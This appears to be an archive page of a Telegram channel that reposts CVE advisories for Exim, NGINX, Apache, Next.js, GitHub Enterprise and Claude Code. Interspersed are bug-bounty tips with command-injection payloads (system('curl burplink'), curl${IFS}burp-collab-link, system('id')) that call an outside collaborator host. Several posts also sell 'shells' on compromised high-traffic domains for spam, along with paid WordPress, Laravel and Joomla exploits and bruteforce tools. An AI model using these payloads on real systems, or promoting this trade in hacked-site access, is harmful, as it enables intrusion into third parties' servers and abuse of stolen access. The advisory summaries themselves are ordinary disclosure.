uz
Feedback
CVE

CVE

Kanalga Telegram’da o‘tish

🔐 CVE | Cyber ​​Vulnerabilities Exchange Group dedicated to sharing and discussing CVEs, zero-days, critical vulnerabilities, exploits, PoCs, and technical analyses of offensive and defensive security. 🟢 Think. Break. Secure. BY: @Mm_fit #cve

Ko'proq ko'rsatish
3 965
Obunachilar
+2124 soatlar
+717 kunlar
+30230 kunlar
Postlar arxiv
CVE
3 965
CVE-2026-46300

CVE
3 965
Flesh Shell 😎 🔥 DM @Mm_fit
Flesh Shell 😎 🔥 DM @Mm_fit

CVE
3 965
new shells 😎 DM 👉 @Mm_fit
new shells 😎 DM 👉 @Mm_fit

CVE
3 965
CVE-2026-45185 Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS closenotify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.

CVE
3 965
CVE-2026-33824 Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network.

CVE
3 965
Hacking a Bug Bounty Platform: JWT Forgery, SSTI & Python Import Hijacking to Root In this video, we exploit an exposed Git repository, forge JWT tokens, abuse SSTI for code execution, and leverage hijacking to gain root ... https://youtu.be/4BzZS4ualn0

CVE
3 965
😄 Large quantity of Shell available 😎 Customer who wants best high quality Shell 😎 ✅ High Traffic Domain ✅ High DA/PA Doma
😄 Large quantity of Shell available 😎 Customer who wants best high quality Shell 😎 ✅ High Traffic Domain ✅ High DA/PA Domain ✅ High DR Domain ✅ Hacklink Market Network Domain ✅ Domain for spam DM 👉 @Mm_fit 🦊 Channel https://t.me/cve0day

CVE
3 965
CVE-2025-59536 Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable to Code Injection due to a bug in the startup trust dialog implementation. Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to the latest version. This issue is fixed in version 1.0.111.

CVE
3 965
Hey Hunter's, DarkShadow is here back again! file upload extension bypass for RCE ❌ metadata injection for RCE ✅ File upload
+1
Hey Hunter's, DarkShadow is here back again! file upload extension bypass for RCE ❌ metadata injection for RCE ✅ File upload vulnerability not just bypassing extension, metadata can be exploited. you can try like: {"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"} guy's if you really love to read then show your love and react❤️ and don't forget to follow me x.com/darkshadow2bd #bugbounty #bugbountytips #rce

CVE
3 965
CVE-2026-42945 NGINX Plus and NGINX Open Source have a vulnerability in the ngxhttprewritemodule module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR ) disabled, code execution is possible.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE
3 965
🟢 This month I'm giving you all a gift! All my quality tools + list will be 50% off! 🔥 ✔️ Bruteforce WordPress= 50% OFF ✔️ Themes WP exploit= 50% OFF ✔️ Laravel exploit= 50% OFF ✔️ Joomla exploit= 50 % OFF Serious buyers call me privately DM 👉 @Mm_fit 🌩 ⏳ Limited time offer ⏳

CVE
3 965
CVE-2025-70849 Arbitrary File Upload in podinfo thru 6.9.0 allows unauthenticated attackers to upload arbitrary files via crafted POST request to the /store endpoint. The application renders uploaded content without a restrictive Content-Security-Policy (CSP) or adequate Content-Type validation, leading to Stored Cross-Site Scripting (XSS).

CVE
3 965
New Videoo: Built a real AI-powered Bug Bounty Agent from scratch using Claude Code, Kali Linux & modern recon tooling 🚀 Automated recon, XSS/SQLi workflows, custom CLAUDE .md system, attack surface mapping & AI-assisted vulnerability hunting. 🎥 https://youtu.be/HRvw79AVoWI

CVE
3 965
CVE-2026-44578 Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVE
3 965
Hye Hunter's, DarkShadow is here back again! Blind RCE in load model💀 if you see any endpoint which load model/function from
+2
Hye Hunter's, DarkShadow is here back again! Blind RCE in load model💀 if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily 2) system('id'); php functions for code injection 3) \"exec\" try blind rce using your burpcollab
Guys, you can join my new YouTube channel. I’ll upload regular videos here. YouTube.com/@darkshadow2bd #rce # bugbounty # bugbountytips

CVE
3 965
CVE-2026-23918 Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol. This issue affects Apache HTTP Server: 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue.

CVE
3 965
CVE-2026-3854 An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delimiter character that could also appear in user input, an attacker could inject additional metadata fields through crafted push option values. This vulnerability was reported via the GitHub Bug Bounty program and has been fixed in GitHub Enterprise Server versions 3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.7 and 3.19.4.

CVE
3 965
CVE-2026-31431 In the Linux kernel, the following vulnerability has been resolved: crypto: algifaead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algifaead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

CVE
3 965
Hey Hunter's, DarkShadow is here back again! Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothin
Hey Hunter's, DarkShadow is here back again! Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothing! This is called Project-Invisible. Here’s the GitHub link: https://github.com/darkshadow2bd/Project-Invisible And don’t miss the full video on my YouTube channel: https://youtu.be/t4yTY0Cg6Ds?si=ZG99_pev06yZFHGi If you’re interested, you can join my YouTube channel. I’ll upload my methods regulerly in YouTube videos if you guys join here. #tools #bugbountytips

CVE
3 965
Hey Hunter's, DarkShadow is here back again! ?url= ❌SSRF, ✅RCE If you find a parameter that passes through the URL, before te
+1
Hey Hunter's, DarkShadow is here back again! ?url= ❌SSRF, ✅RCE If you find a parameter that passes through the URL, before testing for SSRF, try testing for RCE.
1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${IFS}burp-collab-link;#
Now, guys, if you genuinely enjoy reading such methods, show your appreciation. I’ll soon publish a very interesting tool! And Don't forget to follow me x.com/darkshadow2bd #rce #bugbounty #bugbountytips